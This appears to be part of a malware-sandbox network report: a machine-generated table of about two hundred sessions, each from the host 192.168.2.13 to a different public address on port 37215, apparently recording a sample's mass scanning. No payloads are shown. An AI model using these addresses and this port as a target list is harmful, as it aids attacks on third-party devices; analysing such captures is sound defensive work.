                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14317192.168.2.134536241.241.44.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14318192.168.2.1359264197.98.58.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14319192.168.2.135415041.250.136.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14320192.168.2.1354050157.236.82.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14321192.168.2.1357812157.139.149.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14322192.168.2.1354094157.33.38.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14323192.168.2.1352884197.49.100.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14324192.168.2.133837268.94.148.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14325192.168.2.134518298.33.59.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14326192.168.2.1352344197.122.240.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14327192.168.2.134236441.227.101.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14328192.168.2.1348968191.105.92.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14329192.168.2.135544241.29.80.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14330192.168.2.134791041.189.234.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14331192.168.2.1337912197.14.249.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14332192.168.2.1356072157.30.25.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14333192.168.2.1358838157.255.25.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14334192.168.2.1347234109.88.12.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14335192.168.2.133709441.175.142.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14336192.168.2.134914041.1.84.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14337192.168.2.134608441.10.213.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14338192.168.2.1360232157.209.45.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14339192.168.2.1346408197.95.151.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14340192.168.2.1349462176.142.188.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14341192.168.2.1344370153.210.141.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14342192.168.2.134619641.106.17.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14343192.168.2.1333738157.81.244.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14344192.168.2.1345498125.134.223.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14345192.168.2.1345798157.220.66.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14346192.168.2.134952041.220.113.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14347192.168.2.134555641.36.62.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14348192.168.2.134448241.97.181.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14349192.168.2.1335190197.223.90.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14350192.168.2.133714641.69.89.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14351192.168.2.1336224157.171.155.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14352192.168.2.1340492157.142.47.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14353192.168.2.1354160202.92.228.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14354192.168.2.134689068.141.112.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14355192.168.2.1337880157.252.53.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14356192.168.2.134840080.168.160.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14357192.168.2.133727441.135.253.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14358192.168.2.134611841.21.106.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14359192.168.2.1336442157.34.111.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14360192.168.2.1355646157.222.133.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14361192.168.2.1348764105.48.213.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14362192.168.2.1351590157.36.138.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14363192.168.2.133344041.122.42.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14364192.168.2.1333882197.147.30.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14365192.168.2.134578241.242.201.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14366192.168.2.1336850199.215.35.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14367192.168.2.134323878.167.193.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14368192.168.2.1356842157.232.82.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14369192.168.2.1334744157.222.5.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14370192.168.2.1349714135.83.140.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14371192.168.2.1336878113.252.20.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14372192.168.2.1335190197.56.64.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14373192.168.2.1346554167.121.231.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14374192.168.2.1339450118.26.179.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14375192.168.2.135417441.93.46.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14376192.168.2.1354356157.209.210.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14377192.168.2.1348606157.68.166.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14378192.168.2.1352950197.161.143.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14379192.168.2.1340634124.60.226.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14380192.168.2.1334528157.167.229.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14381192.168.2.134663841.179.148.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14382192.168.2.1358294157.60.17.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14383192.168.2.1352820197.103.86.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14384192.168.2.1338090157.198.248.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14385192.168.2.133827232.210.36.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14386192.168.2.1341114157.75.154.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14387192.168.2.1333562157.39.229.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14388192.168.2.1342266203.40.168.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14389192.168.2.1353558157.158.6.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14390192.168.2.1333764197.209.191.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14391192.168.2.1344582197.171.177.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14392192.168.2.1354300217.14.193.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14393192.168.2.1333724197.221.253.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14394192.168.2.135787441.180.27.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14395192.168.2.134566239.37.141.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14396192.168.2.1344214197.207.202.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14397192.168.2.1346432197.103.147.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14398192.168.2.1338230112.161.217.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14399192.168.2.135965441.91.234.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14400192.168.2.1353122197.65.36.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14401192.168.2.1334458197.54.208.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14402192.168.2.1360738197.25.74.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14403192.168.2.1342996157.236.251.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14404192.168.2.1338106157.92.6.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14405192.168.2.134929241.234.137.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14406192.168.2.134603041.173.164.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14407192.168.2.135637441.114.185.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14408192.168.2.1358972176.242.176.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14409192.168.2.133920041.35.110.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14410192.168.2.134102641.111.15.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14411192.168.2.13553702.248.103.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14412192.168.2.1355394197.165.226.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14413192.168.2.133969241.45.95.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14414192.168.2.1354966138.103.121.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14415192.168.2.1351310157.249.238.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14416192.168.2.136094641.214.125.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14417192.168.2.135516841.138.69.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14418192.168.2.133454841.51.53.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14419192.168.2.133760841.87.253.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14420192.168.2.133474441.107.31.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14421192.168.2.1351738155.161.202.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14422192.168.2.1354822197.103.153.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14423192.168.2.133791667.209.198.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14424192.168.2.1337430157.139.37.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14425192.168.2.135065841.133.230.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14426192.168.2.1332832157.26.235.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14427192.168.2.134571459.135.15.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14428192.168.2.1353786218.163.15.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14429192.168.2.134276841.217.93.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14430192.168.2.1347600197.103.229.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14431192.168.2.1350982197.133.135.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14432192.168.2.135227441.181.146.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14433192.168.2.134622241.190.71.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14434192.168.2.1344052157.124.116.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14435192.168.2.1354628197.255.122.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14436192.168.2.1342650162.150.112.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14437192.168.2.1342458157.34.33.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14438192.168.2.1357010157.155.133.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14439192.168.2.135914641.177.154.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14440192.168.2.1334206157.240.124.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14441192.168.2.1349326197.186.97.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14442192.168.2.1350042157.185.235.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14443192.168.2.1349400157.164.91.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14444192.168.2.1358714197.87.39.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14445192.168.2.1341646197.43.82.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14446192.168.2.1335100197.101.116.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14447192.168.2.1347252197.26.179.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14448192.168.2.1341358157.99.112.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14449192.168.2.1350156157.181.73.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14450192.168.2.1359628197.39.223.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14451192.168.2.1344064197.61.44.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14452192.168.2.1347758193.174.178.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14453192.168.2.1343934197.111.174.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14454192.168.2.134483279.242.252.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14455192.168.2.1334676223.182.197.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14456192.168.2.1336042156.236.245.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14457192.168.2.135774036.98.231.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14458192.168.2.135037641.30.80.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14459192.168.2.1346578197.142.227.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14460192.168.2.135411841.6.203.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14461192.168.2.1345634209.142.28.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14462192.168.2.133713241.80.232.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14463192.168.2.1344340197.151.255.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14464192.168.2.134997441.171.204.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14465192.168.2.1347762197.35.9.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14466192.168.2.134613841.109.186.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14467192.168.2.134135041.20.44.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14468192.168.2.134806036.62.180.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14469192.168.2.1354102197.133.203.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14470192.168.2.1360358157.102.218.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14471192.168.2.133462471.229.253.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14472192.168.2.1340636197.202.80.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14473192.168.2.133398841.145.191.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14474192.168.2.133625841.229.85.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14475192.168.2.1347048157.29.194.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14476192.168.2.133317641.27.236.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14477192.168.2.1341708180.221.173.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14478192.168.2.134505668.181.229.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14479192.168.2.1355382157.11.131.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14480192.168.2.135533641.203.211.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14481192.168.2.1339406161.22.206.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14482192.168.2.1336628156.19.168.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14483192.168.2.134834041.12.88.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14484192.168.2.1348488197.55.210.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14485192.168.2.1334838197.31.154.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14486192.168.2.1350626197.201.198.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14487192.168.2.1333516157.25.142.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14488192.168.2.135047641.59.193.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14489192.168.2.1359284107.98.33.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14490192.168.2.1360930157.29.209.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14491192.168.2.1354804197.218.35.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14492192.168.2.1345240157.217.215.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14493192.168.2.134279041.181.113.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14494192.168.2.1340650157.28.85.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14495192.168.2.135943641.111.33.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14496192.168.2.135082841.77.83.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14497192.168.2.1357276124.116.94.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14498192.168.2.135070097.120.67.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14499192.168.2.1336724152.131.107.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14500192.168.2.1356106157.57.175.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14501192.168.2.1350052197.61.77.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14502192.168.2.1351442157.196.163.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14503192.168.2.1334590157.158.182.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14504192.168.2.133907641.22.252.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14505192.168.2.1342352197.102.240.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14506192.168.2.1340406157.192.46.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14507192.168.2.135572892.134.13.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14508192.168.2.133714441.23.52.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14509192.168.2.1352544157.166.74.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14510192.168.2.1353062111.18.58.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14511192.168.2.134675668.178.240.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14512192.168.2.1342330135.196.67.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14513192.168.2.134592614.224.178.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14514192.168.2.134919641.117.156.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14515192.168.2.1337704106.34.154.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14516192.168.2.135069241.146.26.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14517192.168.2.1336312157.252.126.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14518192.168.2.1358360157.186.153.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14519192.168.2.1359296157.170.101.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14520192.168.2.1354512141.135.82.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14521192.168.2.1338218197.187.155.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14522192.168.2.1358360197.94.51.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14523192.168.2.135680441.102.125.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14524192.168.2.1344660157.155.130.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14525192.168.2.1345412157.221.18.15537215
                                                  TimestampBytes transferredDirectionData


